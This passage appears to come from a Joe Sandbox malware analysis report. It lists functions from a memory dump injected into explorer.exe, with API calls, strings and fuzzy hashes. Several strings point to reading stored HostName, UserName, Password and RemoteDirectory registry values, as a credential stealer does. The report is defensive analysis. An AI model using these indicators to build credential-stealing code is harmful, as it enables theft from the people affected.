                                                                                                                              • Part of subcall function 004319E5: RegCloseKey.KERNELBASE(?,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,00431AE2,PortNumber,00000000,00000000), ref: 00431A98
                                                                                                                              • Part of subcall function 0043482C: lstrlenW.KERNEL32(?), ref: 00434845
                                                                                                                              • Part of subcall function 0043482C: lstrlenW.KERNEL32(?), ref: 0043488F
                                                                                                                              • Part of subcall function 0043482C: lstrlenW.KERNEL32(?), ref: 00434897
                                                                                                                            • wsprintfW.USER32 ref: 004349A7
                                                                                                                            • wsprintfW.USER32 ref: 004349B9
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000D.00000002.3226044754.0000000000431000.00000040.80000000.00040000.00000000.sdmp, Offset: 00431000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_13_2_431000_explorer.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: lstrlen$QueryValuewsprintf$CloseOpen
                                                                                                                            • String ID: %s:%u$%s:%u/%s$HostName$Password$RemoteDirectory$UserName
                                                                                                                            • API String ID: 2889301010-4273187114
                                                                                                                            • Opcode ID: 267beccad496cc5ec00cf1fa084eb17e733d28da644bc4707836799fd1dfdea9
                                                                                                                            • Instruction ID: 6c43a53127b509f807d8271c7c16699431dc17cc50279dc306788e9876b92509
                                                                                                                            • Opcode Fuzzy Hash: 267beccad496cc5ec00cf1fa084eb17e733d28da644bc4707836799fd1dfdea9
                                                                                                                            • Instruction Fuzzy Hash: 173100A07003046BC710AB768C45A2FB6EDEFCD788F06591FB14587351DBBAED418BA9
                                                                                                                            Function 0043F92F Relevance: 12.4, APIs: 4, Strings: 4, Instructions: 350COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • memcpy.NTDLL(?,?,?,?,00000000), ref: 0043FB32
                                                                                                                            • memcpy.NTDLL(?,?,00000000,00000000,000001D8,00000000,?,?,?,?,00000054,00000000,00000030,00000000,000001D8,00000000), ref: 0043FB4D
                                                                                                                            • memcpy.NTDLL(?,?,?,00000000,000001D8,00000000,?,?,?,?,00000054,00000000,00000030,00000000,000001D8,00000000), ref: 0043FB60
                                                                                                                            • memcpy.NTDLL(?,?,?,?,?,?,00000000,000001D8,00000000,?,?,?,?,00000054,00000000,00000030), ref: 0043FB95
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000D.00000002.3226044754.0000000000431000.00000040.80000000.00040000.00000000.sdmp, Offset: 00431000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_13_2_431000_explorer.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: memcpy
                                                                                                                            • String ID: -journal$-wal$immutable$nolock
                                                                                                                            • API String ID: 3510742995-3408036318
                                                                                                                            • Opcode ID: a614ee0d3362c15e72b8cac66179f7515401daf51ac878abcaca1cb045d49a2b
                                                                                                                            • Instruction ID: d713bd3f64e9f5017da3ecb241f38ae2208b32befbb090f21e6500dd2f5584ac
                                                                                                                            • Opcode Fuzzy Hash: a614ee0d3362c15e72b8cac66179f7515401daf51ac878abcaca1cb045d49a2b
                                                                                                                            • Instruction Fuzzy Hash: BBD1D5B19043419FC714DF24C881B1BBBE1AF99314F18557EF8998B392DB78D805CB5A
                                                                                                                            Function 00437820 Relevance: 10.9, APIs: 3, Strings: 3, Instructions: 407COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000D.00000002.3226044754.0000000000431000.00000040.80000000.00040000.00000000.sdmp, Offset: 00431000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_13_2_431000_explorer.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: %$-x0$NaN
                                                                                                                            • API String ID: 0-62881354
                                                                                                                            • Opcode ID: 97af279c2d3804047e0bd8858d8159460829083da4cc68962119c53b59c02ce3
                                                                                                                            • Instruction ID: f65f66478411c5a30da96e8da76500503f47576693cb7129d2fa4bf040d2f09a
                                                                                                                            • Opcode Fuzzy Hash: 97af279c2d3804047e0bd8858d8159460829083da4cc68962119c53b59c02ce3
                                                                                                                            • Instruction Fuzzy Hash: 43D1D4B060C3829BD7358B29849072FBBE1AF9D308F24A95FF8C187351D66CC945DB4A
                                                                                                                            Function 00431895 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 46COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetHGlobalFromStream.COMBASE(?,?), ref: 004318A7
                                                                                                                            • GlobalLock.KERNEL32(WKC), ref: 004318B6
                                                                                                                            • GlobalUnlock.KERNEL32(?), ref: 004318F4
                                                                                                                              • Part of subcall function 00431000: GetProcessHeap.KERNEL32(00000008,?,004311C7,?,?,00000001,00000000,?), ref: 00431003
                                                                                                                              • Part of subcall function 00431000: RtlAllocateHeap.NTDLL(00000000), ref: 0043100A
                                                                                                                            • RtlMoveMemory.NTDLL(00000000,00000000,?), ref: 004318E8
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000D.00000002.3226044754.0000000000431000.00000040.80000000.00040000.00000000.sdmp, Offset: 00431000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_13_2_431000_explorer.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Global$Heap$AllocateFromLockMemoryMoveProcessStreamUnlock
                                                                                                                            • String ID: WKC$WKC
                                                                                                                            • API String ID: 1688112647-3140048585
                                                                                                                            • Opcode ID: 1d22d5d5478b83f0fdff3844e1a2c4e626e23c9d4619cca733e48b5e072cc252
                                                                                                                            • Instruction ID: 7525745a592cff04bb66f342c8db3ccb825f9ae214f79ea4535953fc20bf22af
                                                                                                                            • Opcode Fuzzy Hash: 1d22d5d5478b83f0fdff3844e1a2c4e626e23c9d4619cca733e48b5e072cc252
                                                                                                                            • Instruction Fuzzy Hash: 4F016275200305AF8B05AF659C5895F7BAAEF89351F00943FF45587220DF35C9049B2C
                                                                                                                            Function 004378B0 Relevance: 9.2, APIs: 3, Strings: 2, Instructions: 441COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000D.00000002.3226044754.0000000000431000.00000040.80000000.00040000.00000000.sdmp, Offset: 00431000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_13_2_431000_explorer.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: -x0$NaN
                                                                                                                            • API String ID: 0-3447725786
                                                                                                                            • Opcode ID: 10305aa36b1c071c6c467686070300f508ce3241da45867cc522aabced06c491
                                                                                                                            • Instruction ID: 39e921818d2e88f17f8256ef3668f711ed16cbe4d2bfdfcb396a372aec83c3c6
                                                                                                                            • Opcode Fuzzy Hash: 10305aa36b1c071c6c467686070300f508ce3241da45867cc522aabced06c491
                                                                                                                            • Instruction Fuzzy Hash: 9FE105B060C3829BD7359B29849072FBBE1AF9D308F28695FF8C187351D66CC945DB4A
                                                                                                                            Function 00437A5C Relevance: 9.2, APIs: 3, Strings: 2, Instructions: 431COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000D.00000002.3226044754.0000000000431000.00000040.80000000.00040000.00000000.sdmp, Offset: 00431000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_13_2_431000_explorer.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: -x0$NaN
                                                                                                                            • API String ID: 0-3447725786
                                                                                                                            • Opcode ID: aa32ddaad034fb0f217a98675b6513c3c8f0c15088df3246c2f97236adfcca4f
                                                                                                                            • Instruction ID: a928ff4672b33a3a9f2cf654076b7f16aaa1c6452af4b9eb690f14296d2eeb2d
                                                                                                                            • Opcode Fuzzy Hash: aa32ddaad034fb0f217a98675b6513c3c8f0c15088df3246c2f97236adfcca4f
                                                                                                                            • Instruction Fuzzy Hash: ADE1D3B060C3829BD7358B29849072FBBE1AF9D308F24A95FF8C187351D66CC945DB4A
                                                                                                                            Function 00437A28 Relevance: 9.2, APIs: 3, Strings: 2, Instructions: 426COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000D.00000002.3226044754.0000000000431000.00000040.80000000.00040000.00000000.sdmp, Offset: 00431000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_13_2_431000_explorer.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: -x0$NaN
                                                                                                                            • API String ID: 0-3447725786
                                                                                                                            • Opcode ID: 28c1f284833e66dc7a91f0746f8eb8a0878a2c47dbf5dbcd9529e2bcec026d23
                                                                                                                            • Instruction ID: 8e69d605a3f5b173155716d5f1ad50ec7cb78bcdf763cd29427aeaeeb47365b0
                                                                                                                            • Opcode Fuzzy Hash: 28c1f284833e66dc7a91f0746f8eb8a0878a2c47dbf5dbcd9529e2bcec026d23
                                                                                                                            • Instruction Fuzzy Hash: 54E1D3B160C3829BD7358B29849072FBBE1AF9D308F24A95FF8C187351D66CC945DB4A
                                                                                                                            Function 004377F9 Relevance: 9.2, APIs: 3, Strings: 2, Instructions: 414COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000D.00000002.3226044754.0000000000431000.00000040.80000000.00040000.00000000.sdmp, Offset: 00431000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_13_2_431000_explorer.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: -x0$NaN
                                                                                                                            • API String ID: 0-3447725786
                                                                                                                            • Opcode ID: 7763158076e5aca87e28af77ade785d3738ea161c86f3fefbfbbe4e182a524fa
                                                                                                                            • Instruction ID: dd2f05f64b78950f6a733d54b73290af2116eae022f149f3b32548ce841516a8
                                                                                                                            • Opcode Fuzzy Hash: 7763158076e5aca87e28af77ade785d3738ea161c86f3fefbfbbe4e182a524fa
                                                                                                                            • Instruction Fuzzy Hash: 06E1B2B060C3829BD7358B29849072FBBE1AF9D308F24A95FF8C197351D66CC945DB4A
                                                                                                                            Function 004370C9 Relevance: 9.2, APIs: 3, Strings: 2, Instructions: 403COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • _aulldvrm.NTDLL(00000000,00000002,0000000A,00000000), ref: 0043720E
                                                                                                                            • _aullrem.NTDLL(00000000,?,0000000A,00000000), ref: 00437226
                                                                                                                            • _aulldvrm.NTDLL(00000000,00000000,?), ref: 0043727B
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000D.00000002.3226044754.0000000000431000.00000040.80000000.00040000.00000000.sdmp, Offset: 00431000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_13_2_431000_explorer.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: _aulldvrm$_aullrem
                                                                                                                            • String ID: -x0$NaN
                                                                                                                            • API String ID: 105165338-3447725786
                                                                                                                            • Opcode ID: 096c3927a0dcef46170d7161251a23ac31173805debc96ef39090b505a2302eb
                                                                                                                            • Instruction ID: dbaf88c407e1702e7c4efc971adcea22c0ac35a3c1beb7745d639d541234641f
                                                                                                                            • Opcode Fuzzy Hash: 096c3927a0dcef46170d7161251a23ac31173805debc96ef39090b505a2302eb
                                                                                                                            • Instruction Fuzzy Hash: B5D1D4B060C3829BD7358B29849072FBBE1AF9D308F24A95FF8C187351D66CC945DB4A
                                                                                                                            Function 0043898F Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 353COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • _allmul.NTDLL(00000000,?,0000000A,00000000), ref: 00438AAD
                                                                                                                            • _allmul.NTDLL(?,?,0000000A,00000000), ref: 00438B66
                                                                                                                            • _allmul.NTDLL(?,00000000,0000000A,00000000), ref: 00438C9B
                                                                                                                            • _alldvrm.NTDLL(?,00000000,0000000A,00000000), ref: 00438CAE
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000D.00000002.3226044754.0000000000431000.00000040.80000000.00040000.00000000.sdmp, Offset: 00431000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_13_2_431000_explorer.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: _allmul$_alldvrm
                                                                                                                            • String ID: .
                                                                                                                            • API String ID: 115548886-248832578
                                                                                                                            • Opcode ID: a4d7c323909f77d99f55f4f3b0672e8644958cd9d53626777b43799e005c506a
                                                                                                                            • Instruction ID: 6a09bf593fe9d1a3a4356a28bb3c38b68a4271bbe95951f404997e271f8d98b7
                                                                                                                            • Opcode Fuzzy Hash: a4d7c323909f77d99f55f4f3b0672e8644958cd9d53626777b43799e005c506a
                                                                                                                            • Instruction Fuzzy Hash: CED1D4B190C7858BC7209F59848022EFBF0BBD9714F042D6FF6D596381DBB98945878E
                                                                                                                            Function 0045D684 Relevance: 9.1, APIs: 3, Strings: 3, Instructions: 79COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000D.00000002.3226044754.0000000000431000.00000040.80000000.00040000.00000000.sdmp, Offset: 00431000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_13_2_431000_explorer.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: memset
                                                                                                                            • String ID: ,$7$9
                                                                                                                            • API String ID: 2221118986-1653249994
                                                                                                                            • Opcode ID: b1d51447b54f57044a401778e5baa02a08deb2ee8b9c42d589ff759b1829e7d0
                                                                                                                            • Instruction ID: 6fc4edab92ee2027378d69f2c36bec02763afb07156ef030dfc09002926193fb
                                                                                                                            • Opcode Fuzzy Hash: b1d51447b54f57044a401778e5baa02a08deb2ee8b9c42d589ff759b1829e7d0
                                                                                                                            • Instruction Fuzzy Hash: 9B316A715083449FD330DF65D880B8FBBE8AF85344F00892EF98997252EB75964DCBA6
                                                                                                                            Function 00431BC5 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 43stringCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • lstrlenW.KERNEL32(00000000,00000000,?,00432E75,PathToExe,00000000,00000000), ref: 00431BCC
                                                                                                                            • StrStrIW.SHLWAPI(00000000,.exe,?,00432E75,PathToExe,00000000,00000000), ref: 00431BF0
                                                                                                                            • StrRChrIW.SHLWAPI(00000000,00000000,0000005C,?,00432E75,PathToExe,00000000,00000000), ref: 00431C05
                                                                                                                            • lstrlenW.KERNEL32(00000000,?,00432E75,PathToExe,00000000,00000000), ref: 00431C1C
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000D.00000002.3226044754.0000000000431000.00000040.80000000.00040000.00000000.sdmp, Offset: 00431000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_13_2_431000_explorer.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: lstrlen
                                                                                                                            • String ID: .exe
                                                                                                                            • API String ID: 1659193697-4119554291
                                                                                                                            • Opcode ID: 1d2a52696441565f80e0cc015aa8a9b6b42907ee8e42d775b2058dc40d95ad83
                                                                                                                            • Instruction ID: 9b5600007c349b2f8bce4788b6f6217ad8dddede415e52dc22e79e0342253b2f
                                                                                                                            • Opcode Fuzzy Hash: 1d2a52696441565f80e0cc015aa8a9b6b42907ee8e42d775b2058dc40d95ad83
                                                                                                                            • Instruction Fuzzy Hash: 96F0C2303502209AD7646F34AC49BBF62A5EF0A341F216C3FE142C32B1EB688C41C75D
                                                                                                                            Function 00432112 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 29timeCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00431000: GetProcessHeap.KERNEL32(00000008,?,004311C7,?,?,00000001,00000000,?), ref: 00431003
                                                                                                                              • Part of subcall function 00431000: RtlAllocateHeap.NTDLL(00000000), ref: 0043100A
                                                                                                                            • GetSystemTimeAsFileTime.KERNEL32(?), ref: 00432127
                                                                                                                            • _alldiv.NTDLL(?,?,00989680,00000000), ref: 0043213A
                                                                                                                            • wsprintfA.USER32 ref: 0043214F
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000D.00000002.3226044754.0000000000431000.00000040.80000000.00040000.00000000.sdmp, Offset: 00431000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_13_2_431000_explorer.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: HeapTime$AllocateFileProcessSystem_alldivwsprintf
                                                                                                                            • String ID: %li
                                                                                                                            • API String ID: 4120667308-1021419598
                                                                                                                            • Opcode ID: 6772bf3a1b987ec87112f25cfc2adbe67ddbda376e5ccd15da4d22cece3ac70b
                                                                                                                            • Instruction ID: 0e14907fd1ba5cdf3bceadad3492b57d57820c77779278f38477792ad8a9fc86
                                                                                                                            • Opcode Fuzzy Hash: 6772bf3a1b987ec87112f25cfc2adbe67ddbda376e5ccd15da4d22cece3ac70b
                                                                                                                            • Instruction Fuzzy Hash: D8E0D832A4020877C7203BB89D0AFEF7B6CDB40B59F00059AF900E6192E5764A2483D9
                                                                                                                            Function 00442FF6 Relevance: 6.6, APIs: 5, Instructions: 369COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • _allmul.NTDLL(?,00000000,00000018), ref: 0044316F
                                                                                                                            • _allmul.NTDLL(-00000001,00000000,?,?), ref: 004431D2
                                                                                                                            • _alldiv.NTDLL(?,?,00000000), ref: 004432DE
                                                                                                                            • _allmul.NTDLL(00000000,?,00000000), ref: 004432E7
                                                                                                                            • _allmul.NTDLL(?,00000000,?,?), ref: 00443392
                                                                                                                              • Part of subcall function 004416CD: memset.NTDLL ref: 0044172B
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000D.00000002.3226044754.0000000000431000.00000040.80000000.00040000.00000000.sdmp, Offset: 00431000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_13_2_431000_explorer.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: _allmul$_alldivmemset
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3880648599-0
                                                                                                                            • Opcode ID: 046d8b7b3e0929ff4979f6fcf46b9aaa87e7dca74d29b1c13d3f69a449f56726
                                                                                                                            • Instruction ID: b7ecfb7da435fb73dbdb7ab9a6af29a089ba2ec26a84b2415c41fa596d5ae6c0
                                                                                                                            • Opcode Fuzzy Hash: 046d8b7b3e0929ff4979f6fcf46b9aaa87e7dca74d29b1c13d3f69a449f56726
                                                                                                                            • Instruction Fuzzy Hash: 22D18C706083418BEB24DF69C480B6FB7E1AF88B09F14492EF99587351DB78DE45CB4A
                                                                                                                            Function 004687FA Relevance: 6.4, APIs: 1, Strings: 3, Instructions: 388COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000D.00000002.3226044754.0000000000431000.00000040.80000000.00040000.00000000.sdmp, Offset: 00431000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_13_2_431000_explorer.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: FOREIGN KEY constraint failed$new$old
                                                                                                                            • API String ID: 0-384346570
                                                                                                                            • Opcode ID: c45c552f718e5e0b722c544f867c3853ba73f9e7c672d56929e53d0fd7b2b667
                                                                                                                            • Instruction ID: 327ac3d76bcfd9dcd70760d421060b4fff6f850114040e8ddabeed9ef8a9e838
                                                                                                                            • Opcode Fuzzy Hash: c45c552f718e5e0b722c544f867c3853ba73f9e7c672d56929e53d0fd7b2b667
                                                                                                                            • Instruction Fuzzy Hash: 67D128706083009FD714EF25C481A2FBBE9AB88754F104A1EF9458B392EB78D945CB97
                                                                                                                            Function 004396BC Relevance: 6.4, APIs: 5, Instructions: 105COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • _alldiv.NTDLL(000000FF,7FFFFFFF,?,?), ref: 004396E7
                                                                                                                            • _alldiv.NTDLL(00000000,80000000,?,?), ref: 00439707
                                                                                                                            • _alldiv.NTDLL(00000000,80000000,?,?), ref: 00439739
                                                                                                                            • _alldiv.NTDLL(00000001,80000000,?,?), ref: 0043976C
                                                                                                                            • _allmul.NTDLL(?,?,?,?), ref: 00439798
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000D.00000002.3226044754.0000000000431000.00000040.80000000.00040000.00000000.sdmp, Offset: 00431000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_13_2_431000_explorer.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: _alldiv$_allmul
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4215241517-0
                                                                                                                            • Opcode ID: aea503a78b0f5229cb44f0642643f5c49b5350688a0b94e79065ce13f3554f20
                                                                                                                            • Instruction ID: 35c8896b2277323423878264867ca7641e395e0bce6ff9b4e5b3aa053d426f74
                                                                                                                            • Opcode Fuzzy Hash: aea503a78b0f5229cb44f0642643f5c49b5350688a0b94e79065ce13f3554f20
                                                                                                                            • Instruction Fuzzy Hash: A52126315157159AD7347D1A4DC1B2B3688DB9D7A4F24252FFC12C23C1EBDE8C4081AD
                                                                                                                            Function 0044B162 Relevance: 6.1, APIs: 4, Instructions: 137COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • _allmul.NTDLL(?,00000000,00000000), ref: 0044B1B3
                                                                                                                            • _alldvrm.NTDLL(?,?,00000000), ref: 0044B20F
                                                                                                                            • _allrem.NTDLL(?,00000000,?,?), ref: 0044B28A
                                                                                                                            • memcpy.NTDLL(?,?,00000000,?,00000000,?,?,?,00000000,?,?,00000000,00000000), ref: 0044B298
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000D.00000002.3226044754.0000000000431000.00000040.80000000.00040000.00000000.sdmp, Offset: 00431000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_13_2_431000_explorer.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: _alldvrm_allmul_allremmemcpy
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1484705121-0
                                                                                                                            • Opcode ID: abdba188e4bfdf281b7d79c9056e3e56b74dba4e99a21b9df24c58c4e894ef3f
                                                                                                                            • Instruction ID: a0ee92632411bc9e7452e646c9b339bbdcb7ecca234928ee30fc64d4146b0234
                                                                                                                            • Opcode Fuzzy Hash: abdba188e4bfdf281b7d79c9056e3e56b74dba4e99a21b9df24c58c4e894ef3f
                                                                                                                            • Instruction Fuzzy Hash: AF4114756083019BD714EF26C89192BBBE5FFC8344F04492EF98587262DB74EC05CB96
                                                                                                                            Function 00431953 Relevance: 6.0, APIs: 4, Instructions: 37stringCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • lstrlenW.KERNEL32(?,00000000,00000000,?,?,00432F0C), ref: 00431973
                                                                                                                            • lstrlenW.KERNEL32(00486564,?,?,00432F0C), ref: 00431978
                                                                                                                            • lstrcatW.KERNEL32(00000000,?,?,?,00432F0C), ref: 00431990
                                                                                                                            • lstrcatW.KERNEL32(00000000,00486564,?,?,00432F0C), ref: 00431994
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000D.00000002.3226044754.0000000000431000.00000040.80000000.00040000.00000000.sdmp, Offset: 00431000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_13_2_431000_explorer.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: lstrcatlstrlen
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1475610065-0
                                                                                                                            • Opcode ID: feb388e6100d38c244564bdfba5f14a062c5c0727ec1a39287f7831c28697468
                                                                                                                            • Instruction ID: 1e8b991b873dfcea3ae4f89fee4cc70d5fc901527b7d36e475a29a4e66d313d7
                                                                                                                            • Opcode Fuzzy Hash: feb388e6100d38c244564bdfba5f14a062c5c0727ec1a39287f7831c28697468
                                                                                                                            • Instruction Fuzzy Hash: C2E065A230021C1B5714B7AE5C94E7B769DCEC96A5706003AFA08D3312EA5A9C0586B8
                                                                                                                            Function 0045F21C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 78COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00436A81: memset.NTDLL ref: 00436A9C
                                                                                                                            • _aulldiv.NTDLL(?,00000000,?,00000000), ref: 0045F2A1
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000D.00000002.3226044754.0000000000431000.00000040.80000000.00040000.00000000.sdmp, Offset: 00431000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_13_2_431000_explorer.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: _aulldivmemset
                                                                                                                            • String ID: %llu$%llu
                                                                                                                            • API String ID: 714058258-4283164361
                                                                                                                            • Opcode ID: 682599454c5ee9a2cd7c415bff8bd5edcf886b90b7da4f536ec8acc88d1a9ae9
                                                                                                                            • Instruction ID: df38bbfaa897e6c9689a5748fa0e31993056f716ec101296dae6eca0383ca954
                                                                                                                            • Opcode Fuzzy Hash: 682599454c5ee9a2cd7c415bff8bd5edcf886b90b7da4f536ec8acc88d1a9ae9
                                                                                                                            • Instruction Fuzzy Hash: 232104B26446057BC710BA25CC42F6BB758AF85734F04462EF921972C2DB299C1987EA
                                                                                                                            Function 0044203C Relevance: 5.3, APIs: 4, Instructions: 274COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • _allmul.NTDLL(?,00000000,?), ref: 00442174
                                                                                                                            • _allmul.NTDLL(?,?,?,00000000), ref: 0044220E
                                                                                                                            • _allmul.NTDLL(?,00000000,00000000,?), ref: 00442241
                                                                                                                            • _allmul.NTDLL(00432E26,00000000,?,?), ref: 00442295
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000D.00000002.3226044754.0000000000431000.00000040.80000000.00040000.00000000.sdmp, Offset: 00431000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_13_2_431000_explorer.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: _allmul
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4029198491-0
                                                                                                                            • Opcode ID: 3085842643abf35a20991388616d187f76d7e9293e8280a6adbe6ee58f7c727c
                                                                                                                            • Instruction ID: aaff03d1e0c2bb7b9110d01d178244181c9295e5fcfa9b510e8154832b7c6e2e
                                                                                                                            • Opcode Fuzzy Hash: 3085842643abf35a20991388616d187f76d7e9293e8280a6adbe6ee58f7c727c
                                                                                                                            • Instruction Fuzzy Hash: 70A19E703087019BE714EF65C581A2FB7E5AFC8704F40482EFA558B361EBB8EC458B4A
                                                                                                                            Function 004478B9 Relevance: 5.2, APIs: 4, Instructions: 227COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000D.00000002.3226044754.0000000000431000.00000040.80000000.00040000.00000000.sdmp, Offset: 00431000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_13_2_431000_explorer.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: memcpymemset
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1297977491-0
                                                                                                                            • Opcode ID: e9d3cd6ba3f5b9bd65a077e508ec56a81bb732b577464c95d209073f0cba1626
                                                                                                                            • Instruction ID: b5638a30730b19529b5d1a5f34db7cf7e4bd1ab6a501865ed145ebfc92faffbe
                                                                                                                            • Opcode Fuzzy Hash: e9d3cd6ba3f5b9bd65a077e508ec56a81bb732b577464c95d209073f0cba1626
                                                                                                                            • Instruction Fuzzy Hash: 1E819FB16083549FE310DF29C980A2BBBE5EF88704F14496EF88597352D778ED06CB96
                                                                                                                            Function 0043190B Relevance: 5.0, APIs: 4, Instructions: 36stringCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • lstrlen.KERNEL32(?,?,?,?,00000000,00432783), ref: 0043192B
                                                                                                                            • lstrlen.KERNEL32(00000000,?,?,?,00000000,00432783), ref: 00431930
                                                                                                                            • lstrcat.KERNEL32(00000000,?), ref: 00431946
                                                                                                                            • lstrcat.KERNEL32(00000000,00000000), ref: 0043194A
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000D.00000002.3226044754.0000000000431000.00000040.80000000.00040000.00000000.sdmp, Offset: 00431000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_13_2_431000_explorer.jbxd
                                                                                                                            Similarity
